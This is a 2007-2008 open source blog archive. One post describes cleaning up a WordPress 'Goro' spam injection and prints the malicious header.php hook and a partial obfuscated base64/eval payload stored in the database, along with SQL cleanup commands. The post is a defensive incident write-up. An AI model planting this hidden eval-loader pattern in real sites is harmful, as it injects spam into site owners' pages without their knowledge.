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  • Roberto Galoppini 10:49 am on May 24, 2008 Permalink | Reply  

    BlogLab, Learn From Bloggers 

    BlogLab is a laboratory course held by Stefano Epifani and Antonio Sofi at the University of Rome, Faculty of Communication Science. BlogLab introduces students to blogging and how to blog, allowing students to learn by doing through face-to-face and on line discussions with fellows.

    The image was removed as required by the original author, see comments below

    BlogLab is at its second edition, the course aims at helping neo-bloggers to manage their blog with the aid of experienced bloggers for a period of time. A jury will evaluate the works produced, and the winners will eventually get an internship opportunity by selected companies.

    Last year 60 students participated to the course, 50 blogs were opened and managed by the students and 7 companies offered an ad hoc internship program.

    This year I am going myself to be a fellow instructor, along with many well-known Italian bloggers like my friends Nicola Mattina, Diego Bianchi and Antonio Pavolini who I just met yesterday afternoon when I got there.

    Happy blogging!

    Technorati Tags: BlogLab, StefanoEpifani, AntonioSofi, NicolaMattina, DiegoBianchi, AntonioPavolini

    • bugsandfishes 7:32 pm on August 1, 2008 Permalink

      Hi there – I don’t know why you’re using my photo to illustrate this, but whatever the reason I would REALLY prefer if you didn’t use my images without my permission. Thanks! Laura (aka bugsandfishes on Flickr)

    • Roberto Galoppini 10:40 am on August 4, 2008 Permalink

      Hi Laura,

      I am sorry about that, my mistake. Usually I take care to control if they are licensed under a permissive creative commons license. By the way, I really like your photos! Ciao, Roberto

    • bugsandfishes 7:32 pm on August 23, 2008 Permalink

      Thanks for the quick response! Much appreciated 🙂

  • Roberto Galoppini 10:06 pm on December 12, 2007 Permalink | Reply  

    WordPress Spam Injection: ‘Goro’ hacked my blog 

    Two days ago a my Northern European friend Era after reading a post adviced me that my blog site have been silently owned by Search Engine spammers. Spam in blog is definitely not a new phenomenon, but I knew very little of spam injection before, and I hope my experience can help other WordPress users.

    The problem was that a foreign div loads in the header “div id=goro“, and a list of spam links to various porn links. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who actually fixed the problem as follows.

    Within the theme’s page header.php, hacked using likely a wordpress 2.0.1 bug:

    create_function('', get_option("blog_headers")); ?>
    [snipped code]
    <?php $wp_headers() ?>

    Actually those lines of code were calling the code contained within the database in the blog_headers option (“wp_options” table, option_name = ‘blog_headers’):

    f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
    9Cgo/Pg==’;$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;

    Decoding it with base64_decode came out that such code calls an external javascript that pastes on the fly some spam links in the page, writing also in the option field strings of this form rss_*, like the following:

    mysql> select option_value from wp_options where option_name =



    | option_value

    | YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |


    Besides erasing the above mentioned lines from the header.php, you need also to erase blog_headers and ‘friends’ from the database:

    delete from wp_options where option_name = ‘blog_headers’;delete from wp_options where option_name like ‘rss_%’ and option_name

    not in (‘rss_language’,’rss_use_excerpt’,’ rss_excerpt_length’);

    Find the offending goro spamware injection before google bans you from internet pipe. Amazingly as soon as I got it fixed my blog got its previous position.

    Note: My blog is under repair these days, the old theme will soon be available, along with twitters and skype alert. Sorry about that.

    Technorati Tags: wordpress, goro, spam injection, blog spam, FrancescoMosca

    • vseo 12:14 pm on January 8, 2008 Permalink

      Same on footer, same solution

    • Gordon Dewis 11:01 pm on March 13, 2008 Permalink

      You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

      It’s amazing how many people are still affected by it.

    • Apollo Lee 5:56 pm on April 30, 2008 Permalink

      Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.

      I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.

      Thanks again for your post.

    • Roberto Galoppini 9:27 am on May 1, 2008 Permalink

      I am really glad it helped you, when I got in troubles I felt really hopeless. As a matter of fact google has proven to be really fast to give my rank back, and I wish you best of luck with that.

    • Oliver 12:11 pm on June 6, 2008 Permalink

      Good article! your site let me learn more. Thanks!Pls keep up to date.

    • Aaron Wall 8:47 am on June 14, 2008 Permalink

      Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.

    • joe 12:48 pm on July 3, 2008 Permalink

      Hi, why don’t you activate the akismet spam? I have that kind of spam in few blog.

    • Roberto Galoppini 4:03 pm on July 3, 2008 Permalink

      I do Joe, I do.

    • Maria 12:14 pm on August 1, 2008 Permalink

      Very useful information for me. Thank you.

    • Hacker Forums 9:01 pm on October 7, 2008 Permalink

      Most all blog hacks are from people not upgrading their blog software.

      If you don’t make a ton of changes, just backup your template one time, then create or download a script to email you a database dumb every couple days.

    • wynajem kamperów 3:42 pm on October 22, 2008 Permalink

      Thanks for posting this. Mine was hacked with the same hack on the 13th (yes friday). Not great luck for friday the 13th but this post gave me peace.

    • RaiulBaztepo 11:25 pm on March 28, 2009 Permalink

      Very Interesting post! Thank you for such interesting resource!
      PS: Sorry for my bad english, I’v just started to learn this language 😉
      See you!
      Your, Raiul Baztepo

    • Graham 3:39 am on November 12, 2010 Permalink

      I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.

      Sorry about your problems but glad you found a fast fix and we’re restored to your previous Google rank.


  • Roberto Galoppini 9:31 pm on December 10, 2007 Permalink | Reply  

    Open Source ECM: Alfresco opens up to social networks 

    After the announcement of the integration with Facebook Alfresco made public that Alfresco Social Computing Platform – which integrates Alfresco with Adobe Flex, Facebook, iGoogle, MediaWiki, TypePad and WordPress – will be available for download by tomorrow on SourceForge.

    While Alfresco is probably not the first open source projects to experiment with Facebook, John Newton – co-founder and Chief Technical Officer of Alfrescobelieves that pushing for the expansion of social computing in the enterprise is an imperative. John on his “manifesto for Social Computing in the Enterprise” states:

    The next generation of enterprise employees who started using the internet in their early teens have only known this evolving culture of free and creative development of the internet and now demand better of the enterprise software that they meet.

    While I don’t know if every CTO should be on Facebook, as says Jon Williams at the New York CTO blog, I believe Seth Gottlieb‘s theory is correct:

    most Intranets fail as social collaboration tools because they cannot capture the energy and passion that seems to form spontaneously on the web. And my theory goes on to assert that people do not invest their personal energy on their corporate intranet because they don’t own it.

    John, why are you addressing Facebook audience?

    In order for ECM to move from 10% that are specialists in a firm (compliance, doc control, regulatory, maintenance and web sites) to the 90% that need it to control out-of-control information on shared drives, it would need to introduce compelling user interfaces based upon social networking and social computing.

    I think Alfresco did a great move addressing needs of the new generation of knowledge workers is enabling a new enterprise vision of social computing.

    Last but not least Alfresco rather than building everything on its own is defining an architecture of participation based on Web Scripts Framework. Let’s see if it will eventually help them to foster their community.

    Technorati Tags: Alfresco, JohnNewton, SethGottlieb, JonWilliams, Social Software, Facebook, oss, commercial open source, open business

  • Roberto Galoppini 1:38 pm on November 9, 2007 Permalink | Reply  

    Commercial Open Source Blog: one year in review 

    Today I took my time to zoom back over my last year blogging over open source. Commercial Open Source blog has just completed its first year of life.

    In November 2006 I scrambled with the generous help of Antonella Beccaria and little advice of my new media mentor Robin Good to create the blog site you are just reading now.

    A year in reviewA year in review by _mpd_

    I was happy. I was excited. I could not hold myself in place. I felt that the time to share my ideas, some of my experiences, a bit of my know-how had definitely come.

    I see the web as a venue for sharing, exchanging and making valuable conversations, and I thought that I had to make myself fully part of this.

    One idea that significantly influenced my decision to take on blogging was the Open Source Franchising business model. As a matter of fact in the summer 2006 I had already written a paper describing such business model, which I had also submitted to Sun Microsystems. My desire, especially since Sun didn’t ever comment back on my proposal, was then to extend my quest for feedback and opinions from other authoritative open source thought leaders.

    Matt Asay positively commented my idea, and many others followed, opening the conversation. It was my very first success as blogger, and it showed me the importance and effectiveness of using a blog to create an online dialog. The conversation went on for several months, until Simon Phipps – Chief Open Source Officer at Sun – fully embraced my idea to the point of taking up the flag himself.

    Thanks to this and probably to some of my other writings, some initial gigs came through:

    And that’s how I discovered how blogging could be helpful to get invited in meetings, events and conferences, eventually opening me doors and new opportunities. As I go forward in my blogging experience I am realizing that my use of writing to get greater exposure and visibility may very well be my very best marketing strategy.

    Like it or not, I had also my share of ego-boosting. Initially mostly for psychologically reward, later on as an increasingly valuable meter of my own professional credibility, I have had spent my share of time checking up technorati and looking at google ranks, just as everyone else. And I learned a few things:

    1. you can get to know lots of like-minded people who share your interests, passions and sometimes business customers and reach out to them in ways that would be next to impossible in the physical world:

    2. among my key referrals opensource.org and openoffice.it/org have played a significant role in sending me huge number of visitors, that made me realize how important is to keep contributing whenever possible to such large and important communities;
    3. Robin Good was totally right suggesting me to pay great attention to choose the tag-line. Googling for Commercial Open Source my blog is always one of the very first results. In reason of that PR agencies and CEOs from all around the world touch base with me daily to open more and more conversations.
    4. I learned to stay focused and to not get distracted by off topic arguments, as soon as I did I was rightly “ripreso” for that.

    Last but not least, I wish to share some authors and bloggers I found inspirational:

    I learned a lot from them, and with some I am enjoying regular conversations. After all the ultimate reason to keep writing daily for all of us is that it is really true that no man is an island, not even a blogger!

    Technorati Tags: open source blog, professional blogging, SavioRodrigues, DanaBlankenhorn, MatthewAslett, RossTurk, SourceForge Marketplace, JamesMcGovern, RedMonk

    • Stefano Canepa 3:50 pm on November 9, 2007 Permalink

      Thanks very much. I read and read again you post. Your blog is one of the more interesting in my blogroll.

    • Antonella Beccaria 9:50 pm on November 9, 2007 Permalink

      Great work in this year, Roberto. Good luck for your future.

    • Roberto Galoppini 11:30 am on November 12, 2007 Permalink

      Thank you Stefano for your kind comments!

      Antonella you helped me a lot, thank you!

    • Paolo Corti 10:16 am on November 13, 2007 Permalink

      Roberto, congratulations! 😉

    • Savio Rodrigues 5:54 am on November 16, 2007 Permalink

      Roberto, it’s great to read your views on the OSS marketplace. How time flies…I remember thinking that blogging was a waste of time a year ago.

      But I’ve learned so much from folks like yourself and the others you mention in your post….Like I’ve always said, better to have smart friends than be smart 😉

      BTW, advice #2 you received from Robin Good was great advice. I wish I’d thought about that before going with rand($thoughts) as my blog title…live and learn!

      Happy 1 year anniversary

    • Roberto Galoppini 10:40 am on November 16, 2007 Permalink

      Thank you Paolo, see you around!

      Savio I believe you’re right, blogging is all about conversations with brilliant people like you and the others. So, here I am tagging you with a blog-game named “my five open source blogger heroes”, it’s your turn.. 😉

      By the way, thank you very much for your kindly notes of congratulations.

    • Idetrorce 1:35 pm on December 15, 2007 Permalink

      very interesting, but I don’t agree with you

  • Roberto Galoppini 10:45 am on October 20, 2007 Permalink | Reply  

    Open Source Government: Development and Strengthening of Local and Central Public Administrations 

    I just got back from Sarajevo, where I participated as speaker to an advanced course in web communications in the Public Administration. The course, aimed at public operators from Bosnia-Herzegovina, was designed to be an in-depth analysis on the use of Open Source in Public Administrations.

    SarajevoSarajevo by Giuli@

    I had the honor of presenting two seminar sessions, talking about Open Standards and Open Source Software. I opened my first speech focusing on what is a software patent, and how they (could) affect open data standards. I spent an hour or so talking about on Open Source Requirements, Principles and Practices and making analogies with the real world (power plugs, etc).

    My second pitch was all about pragmatic open source. I started speaking about how Organisational Wiki Adoption could greatly help communications and information flows within Public Administrations. The audience was pretty interested and we eventually ended comparing email, Instant Messaging and Groove against a wiki, in terms of usability, synchronicity of interaction and ease of participation.

    Attendees were concerned about the Open Source perception, and open source support, and I showed them some useful tools to manage software selections. Since only few open source projects offer enterprise support, I make them familiar with:

    I really enjoyed being there. The audience, despite the latency due to the translation, was participative and willing to know more and more.

    Is a country of contrast, where people died together, and now try to live together. A very interesting country, and I really hope to get a chance to be back.

    About the Communications for the Public Administration course.

    The project “Balkans 2 – Development and Strengthening central and local PA in the Balkan Region” is aimed to 6 Balkan countries (Albania, Bosnia-Herzegovina, Croatia, Macedonia, Serbia and Montenegro) and continues the activities already started up and partly developed with the Balkans 1 project which was held from November 3rd to December 31st 2004. This is an integrated project of “Institutional and Capacity Building” aimed to civil servants and executives from central and local Balkan administrations, divided into diverse activities of technical assistance, classroom and on-the-job training, information and communications on themes which have been identified and agreed upon together with the institutional counterparts of the involved countries on the occasion of numerous missions and meeting realized during the first year of activities. The dedicated areas are the following:- Civil Protection- Management of Protected Areas- Cultural Heritage- Communications for the Public Administration.

    Technorati Tags: Sarajevo, Bosnia, Herzegovina, Open Source Government, Open Standards, QSOS, SourceForge

    • Ryck Lent 2:16 am on October 22, 2007 Permalink

      Another resource for open source, specifically for organizations considering enterprise open source solutions, is the EOS Directory. It contains over 300 enterprise-class projects with comments and an independent rating for enterprise readiness, in English and Deutsch.

      Ryck Lent
      Community Manager, EOS Directory

    • Roberto Galoppini 8:01 am on October 22, 2007 Permalink

      Hi Ricky,

      I didn’t know about the Optaros EOS Directory, thank you! I found interesting the “track your popolarity” functionality, may be a top 10 list or more would be even better.

      Keep in touch!

  • Roberto Galoppini 10:16 pm on July 18, 2007 Permalink | Reply  

    Open Source Links: 18-07-2007 

    Disappointed: Nick Gall of Gartner – James McGovern wonders why at Gartner don’t spend time answering his questions. My guess is that they are not (yet) deeply into the ‘blog thing’, because if they had a look at their popularity James’s blog pops up as one of the most authoritative pointing to them.

    Office 2.0 Conference Website Now Live – The upcoming Office 2.0 Conference is now live, attendee registration are open by now.
    blogging is dead, long live communicating – Luis Villa says that most discussions about blogging would be much better off if we analyzed ‘communication that is public, searchable and persistent’ instead of ‘blogging’. I totally agree.

    We need an Open Service Definition – People at GNOME (Havoc Pennington’s blog) is thinking to to protect our private data, , but the same definition could reward also services which use and promote open knowledge. Interesting issue.

    Will Oracle Buy Red Hat or BEA? – Savio plays Nostradamus and predicts that Oracle will not buy Red Hat. Oracle may buy BEA. Read his post to know why.

    Managing backup of MySQL via iPhone – Whether it makes sense or not, Zamanda presented to a couple of their customers a solution to manage MySQL backups via iPhone, read the use case.

    Can’t buy me (OOXML) love in Italy – Bob Sutor enjoyed Carlo Piana’s post “OOXML does not buy its way in Italy“, and he posed also a question: is whether a large company with a lot of money and business partners will essentially be able to stack committees so that they are out of balance and therefore buy an ISO standard? I am afraid that the whole ISO standardization process lost some sense, the ultimate result of the File Format War might be just invalidate the process owner itself..

    Talend raises $3.5m in Series B funding round – Raven Zachary tells us about the Talend 2nd round.

    Funambol is a 2007 AO 100 Top Company – Fabrizio got listed in the AO 100 Top Companies, congratulations!

    Gartner, Open Source, and Microsoft Seth keeps posting on the subject, he simply can’t resist! 😉

  • Roberto Galoppini 12:19 pm on June 26, 2007 Permalink | Reply  

    Barcamp: Vlogcamp, a barcamp on Video-blogging 

    The first Italian Barcamp about video-blogging and Web TV went live over the Internet in many different forms, last Saturday from Taxi Channel studios, here in Rome.

    vlog camp Vlog camp, Robin Good & Tommaso Tessarolo Smeerch

    Despite the hot day, there were quiet a few people, and I happened to know Bruno Pellegrini. founder of Nessuno.TV a portal for Italian videobloggers, and also TheBlogTV, probably the first TV station broadcasting user-generated content. Bruno wrote also a book, entitled “Io? Come diventare videoblogger e non morire da spettatore” (eng: Me? How to become a videoblogger and do not die spectator), given as a present to all participants.

    Tommaso Tessarolo, author of another book entitled “NetTv“, was also present, and he presented an interesting backstage video.

    Robin Good went live all the time on his robingood.tv, I happened to help him recording his speech about how to become a video-blogger, and I interviewed Amanda Lorenzani and Leo Sorge talking about Italian startups.
    Robin Good reported the whole event through two different posts Part 1 and Part 2, if you speak Italian or you want to, have a look!

    Technorati Tags: vog camp, barcamp, theblogtv

    • Savio Rodrigues 8:52 pm on June 26, 2007 Permalink

      Hey Roberto, thanks for keeping us in the loop. Looks like a great time even if I can’t understand Italian 🙂

  • Roberto Galoppini 6:44 pm on May 19, 2007 Permalink | Reply  

    Open Source Links: 19-05-2007 

    Business as Usual – Bill Hilf on Port25: It’s not us versus the free world.

    Three Minutes with Microsoft’s Open-Source Manager – Bill Hilf explains Microsoft strategy: to license and not litigate. Am I the only one thinking to the Cold war at this stage?

    235 more reasons to love open source – Fabrizio Capobianco designed a funny and provoking t-shirt, and I guess he is going to bring along an XXL one for Bill Hilf next Monday!

    Steve? Darl? All of the Above? – Billy Marshall asserts that Microsoft won’tl like the nature of the collateral damage caused by the 235 move.

    (added on the 20th) Microsoft’s Patent Impasse – A lucid commentary by Cote’, really enlightening.
    Organizing an Open Source Workshop!!! – A workshop entitled “Open Source, Open Ideas” will be held on Tuesday May 29th at the Politecnico di Bari campus sponsored jointly by Politecnico di Bari, OrgLab (University of Cassino), Syracuse University and IESEG School of Management.

    Dell announces the models for Ubuntu – Jeremy discloses Dell’s Ubuntu models.

    I’m Joining Adobe – Ryan Stewart joined Adobe as a Rich Internet Application Evangelist.

  • Roberto Galoppini 8:14 pm on March 9, 2007 Permalink | Reply  

    Community development: O’Reilly joins MySQL Board 

    MySQL is really working hard to foster its community, and now the MySQL Winter of Code initiative sounds just like the first notable step. Today Tim O’Reilly explained why he just joined the MySQL Board.

    O'ReillyO’Reilly by Duncan Davidson

    Second, Märten, Monty, and David asked me nicely :-), and after some substantial discussions with them, I came to the conclusion that I could add some value to the company. They were looking for someone who had a sense of the competing pressures of business and open source idealism, and could help them steer a careful course through the obstacles. As open source grows up, there can be tension between its community roots and its business aspirations. But that tension can also be a creative force, and MySQL AB wants to be sure to continue to harness the creativity of the open source developer community, as it becomes an ever-more viable alternative to existing closed source commercial databases.

    Well done MySQL, well done.. and they are already getting the very first result:

    While I’m on the subject of MySQL, I should mention that O’Reilly produces the MySQL User Conference in conjunction with MySQL AB. The conference will be held April 23-26 in Santa Clara. The early registration discount ends March 14, so if you’re interested in MySQL, you should sign up now.

    Whatever you call it – Word of Mouth, Liquid, or Viral Marketing – it works, and any commercial open source firm just need it indeed.

    Technorati Tags: open source, MySQL, O’Reilly

    • Savio Rodrigues 11:32 pm on March 9, 2007 Permalink

      Cool – thanks for pointing this out Roberto!

      I think the thing I really like about MySQL as a business is that they are up front about their commercial aspirations.

      They do x,y and z and it just so happens that z=”make $$ using a dual license approach”. And since x=”build & maintain an active community”, it just feels like a good balance.

  • Roberto Galoppini 12:33 pm on March 2, 2007 Permalink | Reply  

    Blog: Robin Good’s way to be your own boss 

    Robin Good, a famous indipendent online Publisher, while in Ancona’s barcamp held a very interesting speech titled “Be your own boss”, explaining how making money blogging.

    Robin Good's presentationPhotography courtesy of 7th Floor – MAP

    He also wrote a good piece based on his presentation. A must read If you want to know how to make your blog more effective. wether you’re interested or not in making money from it. Fourteen out of the sixteen points indeed are not about monetizing, and many of them point to other resources.

    • Find your passion
    • Create your shack
    • Niche, Theme, Focus
    • Write daily
    • Become a Newsmaster
    • Quality not Quantity
    • Make Yourself Be Found
    • Make Yourself Be Read
    • Communicate Visually
    • If you want them to return, send them away Open the conversation
    • Create your own “brand”
    • Promote your contents Monetize
    • Google AdSense
    • Track, Monitor, Test

    Take your time, and read them all!

    Technorati Tags: blog, robin good, newsmaster, barcamp

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